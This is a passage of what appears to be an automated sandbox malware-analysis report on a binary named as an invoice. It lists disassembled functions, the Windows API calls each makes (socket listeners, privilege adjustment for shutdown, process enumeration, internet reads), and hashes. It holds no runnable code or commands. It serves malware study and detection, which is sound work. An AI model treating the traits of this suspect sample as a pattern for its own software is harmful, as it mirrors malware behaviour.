                                          • Opcode Fuzzy Hash: e41a741f13836c122e1a93b35399af2899a1ae988daff58317c02930b9991c4e
                                          • Instruction Fuzzy Hash: 5551717180514CAACF05EFA1C9929EEB778AF14319F60047EE40277191EB396F0DCB5A
                                          Function 0046F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
                                          • Sleep.KERNEL32(0000000A), ref: 0046F470
                                          • _wcscmp.LIBCMT ref: 0046F484
                                          • _wcscmp.LIBCMT ref: 0046F49F
                                          • FindNextFileW.KERNEL32(?,?), ref: 0046F53D
                                          • FindClose.KERNEL32(00000000), ref: 0046F553
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                          • String ID: *.*
                                          • API String ID: 713712311-438819550
                                          • Opcode ID: b21b5751c67d20c7492c03ab1b01f4f28f86a4b8690f8ee467c0eb4bada205d6
                                          • Instruction ID: 52678bcd3f78e7a2dee1500e624958e336d76892905c76040bb4fc6126c74c58
                                          • Opcode Fuzzy Hash: b21b5751c67d20c7492c03ab1b01f4f28f86a4b8690f8ee467c0eb4bada205d6
                                          • Instruction Fuzzy Hash: D0418D71904219AFCF10EF64DC45AEFBBB4FF04314F50446BE855A2291EB38AE88CB59
                                          Function 00413030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __itow__swprintf
                                          • String ID: 3cA$_A
                                          • API String ID: 674341424-3480954128
                                          • Opcode ID: 8350981069d39a37c1030e6ccff990e0f9e160ede75b231a4a1c40ae3a2eb9ee
                                          • Instruction ID: 703a96bf305cb9905ff3d3c25826e0fcfbd93ba8a00a4d78e9854e8314894fca
                                          • Opcode Fuzzy Hash: 8350981069d39a37c1030e6ccff990e0f9e160ede75b231a4a1c40ae3a2eb9ee
                                          • Instruction Fuzzy Hash: AB229B716083009FD724DF14C881BABB7E4AF85314F11492EF89A97392DB78E945CB9B
                                          Function 00415760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: bc62f7b523a37f67c520ce678140ca6f872d5d6cfe4b2560a72284cb67dcae8d
                                          • Instruction ID: fe3fa380dd79410c0d4e58696af30f423fcd40af0ea7aa6f8d28fb308e13f721
                                          • Opcode Fuzzy Hash: bc62f7b523a37f67c520ce678140ca6f872d5d6cfe4b2560a72284cb67dcae8d
                                          • Instruction Fuzzy Hash: 9D12AC70A00609DFCF04DFA5D981AEEB3F5FF88304F10452AE846A7291EB39AD55CB59
                                          Function 004651BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                            • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                            • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                          • ExitWindowsEx.USER32(?,00000000), ref: 004651F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                          • String ID: $@$SeShutdownPrivilege
                                          • API String ID: 2234035333-194228
                                          • Opcode ID: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                          • Instruction ID: a9b7a44e2451b6884de2a96c8f52f71cfd0e95415fa4985b61f57267d5601e10
                                          • Opcode Fuzzy Hash: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                          • Instruction Fuzzy Hash: D201F7317916116BF7286668ACAAFBB7358DB05345F2008BBFD03E21D2FD591C058A9F
                                          Function 00476283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004762DC
                                          • WSAGetLastError.WSOCK32(00000000), ref: 004762EB
                                          • bind.WSOCK32(00000000,?,00000010), ref: 00476307
                                          • listen.WSOCK32(00000000,00000005), ref: 00476316
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00476330
                                          • closesocket.WSOCK32(00000000,00000000), ref: 00476344
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                          • String ID:
                                          • API String ID: 1279440585-0
                                          • Opcode ID: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                                          • Instruction ID: 9cc0b371228dcaf8913226d6fe42490e105b9b769aefcc5547ebbaeef9b3f94b
                                          • Opcode Fuzzy Hash: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                                          • Instruction Fuzzy Hash: 6521F2312006049FCB10FF64C845A6EB7BAEF44324F15856EEC1AA73D2C734AC05CB59
                                          Function 00415520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                            • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                          • _memmove.LIBCMT ref: 00450258
                                          • _memmove.LIBCMT ref: 0045036D
                                          • _memmove.LIBCMT ref: 00450414
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                          • String ID:
                                          • API String ID: 1300846289-0
                                          • Opcode ID: 77f534bd7fd64369b1f9f63b99cc074bbebc99142de360515bc227b2d532a671
                                          • Instruction ID: ce31bd404333394545349dab4fd8ad238969c684e33d592a62d2001407cdf1f6
                                          • Opcode Fuzzy Hash: 77f534bd7fd64369b1f9f63b99cc074bbebc99142de360515bc227b2d532a671
                                          • Instruction Fuzzy Hash: 3202E270A00205DBCF04DF65D9816AEBBF5EF84304F54806EE80ADB392EB39D955CB99
                                          Function 00401287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
                                          • GetSysColor.USER32(0000000F), ref: 00401A4E
                                          • SetBkColor.GDI32(?,00000000), ref: 00401A61
                                            • Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ColorProc$LongWindow
                                          • String ID:
                                          • API String ID: 3744519093-0
                                          • Opcode ID: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                          • Instruction ID: d041ec2a837aeb515327988813bafb0785b4d0a615f46c6b1421ede386c2745f
                                          • Opcode Fuzzy Hash: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                          • Instruction Fuzzy Hash: A4A124B1202544BAE629BA694C88F7F255CDF45345F14053FF602F62F2CA3C9D429ABE
                                          Function 00476747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0047679E
                                          • WSAGetLastError.WSOCK32(00000000), ref: 004767C7
                                          • bind.WSOCK32(00000000,?,00000010), ref: 00476800
                                          • WSAGetLastError.WSOCK32(00000000), ref: 0047680D
                                          • closesocket.WSOCK32(00000000,00000000), ref: 00476821
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                          • String ID:
                                          • API String ID: 99427753-0
                                          • Opcode ID: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
                                          • Instruction ID: 4f4fa4b069b112be458f20050bee2991dabce79e459f6d74e9331a247e2dcb9e
                                          • Opcode Fuzzy Hash: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
                                          • Instruction Fuzzy Hash: E941D275A00600AFDB10BF258C86F6E77A89F45718F05C56EFA59BB3C3CA789D008799
                                          Function 00485376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                          • String ID:
                                          • API String ID: 292994002-0
                                          • Opcode ID: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                          • Instruction ID: 2bf7cd1b22f0a435aba1bf6783624a0e9851140f374647b9b1574053626a0f4e
                                          • Opcode Fuzzy Hash: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                          • Instruction Fuzzy Hash: BB11B232700911ABEB217F269C44A6F7B99EF447A1B40483EFC45E3242DB789C0287AD
                                          Function 004580A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          • Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                          • Instruction ID: 8dae455e1ba13099d0d58f164bb34b259a0b96a713bdc7d240504e0717c8d456
                                          • Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                          • Instruction Fuzzy Hash: EBF08C30200614AFEB104FA4EC8CE6B3BACEF4A755B10043EF90592251DF649C09DB64
                                          Function 0046C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 0046C432
                                          • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                          • CoUninitialize.OLE32 ref: 0046C6B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                          • String ID: .lnk
                                          • API String ID: 2683427295-24824748
                                          • Opcode ID: 8be31365239305a4f0ecbc96338834b64287ccbcc385a5ffb8382792e3c7b4fb
                                          • Instruction ID: adb56a4b7a52abdaef05598002f92e73435f728c8d9d90c66f29e414dbdf6fe1
                                          • Opcode Fuzzy Hash: 8be31365239305a4f0ecbc96338834b64287ccbcc385a5ffb8382792e3c7b4fb
                                          • Instruction Fuzzy Hash: 5AA14AB1104205AFD700EF55C881EAFB7E8EF85308F00492EF595972A2EB75EE09CB56
                                          Function 00404B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                          • API String ID: 2574300362-192647395
                                          • Opcode ID: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                          • Instruction ID: eac2b9657e48c1354d3ce07b29e145d4c0a45f8badf8df95cafcbf2a1bd35060
                                          • Opcode Fuzzy Hash: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                          • Instruction Fuzzy Hash: 8ED01274A10713CFD720AF31D818B0A76E4AF45751B218C3F9485D6690D678F8C4C75C
                                          Function 0047EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                          • Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                          • String ID:
                                          • API String ID: 2576544623-0
                                          • Opcode ID: 8474e8f7e6d518a839c74cc5eb54a158aeec258ffafa63196fda6ec9f60604bc
                                          • Instruction ID: a98c0e68db7b9d45d0fd814aff1298f869d04e0007e226020b87bcf654703779
                                          • Opcode Fuzzy Hash: 8474e8f7e6d518a839c74cc5eb54a158aeec258ffafa63196fda6ec9f60604bc
                                          • Instruction Fuzzy Hash: BB519171504300AFD310EF21CC85EABB7E8EF88714F10492EF595A72A1DB34AD08CB96
                                          Function 0045E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: lstrlen
                                          • String ID: ($|
                                          • API String ID: 1659193697-1631851259
                                          • Opcode ID: f379fe3d7a712482d9e6716fbfa6b33f72221a7867f36e4c9f34936809415def
                                          • Instruction ID: d66d97c7bb63d5e7dad9b567a4e3f94d41a6da7275ee88609bc8c1bec3a8e44c
                                          • Opcode Fuzzy Hash: f379fe3d7a712482d9e6716fbfa6b33f72221a7867f36e4c9f34936809415def
                                          • Instruction Fuzzy Hash: 21322675A007059FD728CF2AC481A6AB7F0FF48310B15C56EE89ADB3A2E774E941CB44
                                          Function 004722EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
